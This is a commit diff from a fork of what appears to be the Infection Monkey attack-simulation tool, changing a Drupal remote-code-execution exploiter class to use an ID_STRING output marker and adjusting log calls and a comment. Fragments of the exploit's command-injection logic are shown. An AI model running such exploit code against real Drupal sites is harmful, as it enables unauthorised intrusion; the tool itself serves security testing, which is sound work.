forked from p34709852/monkey
use ID_STRING instead of dashes
This commit is contained in:
parent
c9ea95110c
commit
b82a6e48b2
|
@ -8,6 +8,7 @@ import logging
|
|||
import requests
|
||||
from urllib.parse import urljoin
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import ID_STRING
|
||||
from network.network_utils import remove_port
|
||||
|
||||
__author__ = 'Ophir Harpaz'
|
||||
|
@ -70,7 +71,7 @@ class DrupalExploiter(WebRCE):
|
|||
for node_id in node_ids:
|
||||
node_url = urljoin(url, str(node_id))
|
||||
if self.check_if_exploitable(node_url):
|
||||
self.add_vuln_url(url) # Where is this used?
|
||||
self.add_vuln_url(url) # This is for report. Should be refactored in the future
|
||||
self.vulnerable_urls.append(node_url)
|
||||
if stop_checking:
|
||||
break
|
||||
|
@ -114,7 +115,7 @@ class DrupalExploiter(WebRCE):
|
|||
|
||||
def exploit(self, url, command):
|
||||
# pad a easy search replace output:
|
||||
cmd = 'echo ---- && ' + command
|
||||
cmd = f'echo {ID_STRING} && {command}'
|
||||
base = remove_port(url)
|
||||
payload = {
|
||||
"link": [
|
||||
|
@ -145,10 +146,10 @@ class DrupalExploiter(WebRCE):
|
|||
if check_drupal_cache(r):
|
||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
||||
|
||||
if '----' not in r.text:
|
||||
LOG.info('[warn] Command execution _may_ have failed')
|
||||
if ID_STRING not in r.text:
|
||||
LOG.warning('Command execution _may_ have failed')
|
||||
|
||||
result = r.text.split('----')[-1]
|
||||
result = r.text.split(ID_STRING)[-1]
|
||||
LOG.info(f'Drupal exploit result = {result}')
|
||||
return result
|
||||
|
||||
|
|
Loading…
Reference in New Issue